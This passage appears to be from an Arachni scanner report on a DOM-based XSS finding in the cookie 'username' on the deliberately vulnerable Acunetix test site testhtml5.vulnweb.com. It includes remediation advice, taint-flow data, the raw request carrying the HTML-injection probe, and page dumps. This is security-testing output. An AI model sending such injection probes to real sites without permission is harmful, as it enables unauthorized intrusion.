type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.
Unlike traditional Cross-Site Scripting (XSS), where the client is able to inject scripts into a request and have the server return the script to the client, DOM XSS does not require that a request be sent to the server and may be abused entirely within the loaded page.
This occurs when elements of the DOM (known as the sources) are able to be manipulated to contain untrusted data, which the client-side scripts (known as the sinks) use or execute an unsafe way.
Arachni has discovered that by inserting an HTML element into the page’s DOM inputs (sources), it was possible to then have the HTML element rendered as part of the page by the sink.
Client-side document rewriting, redirection, or other sensitive action, using untrusted data, should be avoided wherever possible, as these may not be inspected by server side filtering.
To remedy DOM XSS vulnerabilities where these sensitive document actions must be used, it is essential to:
document.createElement, element.setAttribute, element.appendChild,
etc. to build dynamic interfaces as opposed to HTML rendering methods such as
document.write, document.writeIn, element.innerHTML, or element.outerHTML etc.cookie_dom
input
username
using
GET
at
http://testhtml5.vulnweb.com/login
pointing to
http://testhtml5.vulnweb.com/
.
0 | username=admin; Path=/ |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
cookie_dom |
http://testhtml5.vulnweb.com/login | http://testhtml5.vulnweb.com/ |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||||
|---|---|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
||||
| 6 | 0.800369 | click |
<a href="#/archive" data-arachni-id="916551842">
|
|
||||
| 7 | 0.355032 | request |
http://testhtml5.vulnweb.com/static/app/partials/archive.html |
|
||||
| 8 | 0.250829 | request |
http://testhtml5.vulnweb.com/ajax/archive |
|
||||
| 9 | 10.123394 | load |
page
|
|
Data-flow sinks track the flow of the injected taint through key points in the Javascript environment of the page. Each sink is a function which was passed tainted arguments.
Taint is:
"xss_dom_0c25785427908905790d3a663dc49fa7"
| # | Object | Function | |
|---|---|---|---|
| 0 |
Window
|
unescape()
|
Inspect |
| 1 |
jQuery
|
c()
|
Inspect |
| 2 |
jQuery
|
(e)
|
Inspect |
| 3 |
Window
|
unescape()
|
Inspect |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: username=admin<xss_dom_0c25785427908905790d3a663dc49fa7/> Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:58:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
Welcome <b>admin<xss_dom_0c25785427908905790d3a663dc49fa7/></b> | <a href='/logout'>Logout</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="-1412534057"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"xss_dom_0c25785427908905790d3a663dc49fa7":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b>admin<xss_dom_0c25785427908905790d3a663dc49fa7></xss_dom_0c25785427908905790d3a663dc49fa7></b> | <a href="/logout" data-arachni-id="-2013462102">Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">admin<xss_dom_0c25785427908905790d3a663dc49fa7></xss_dom_0c25785427908905790d3a663dc49fa7> is coming from <b>unknown</b> and has visited this page <b>5</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this 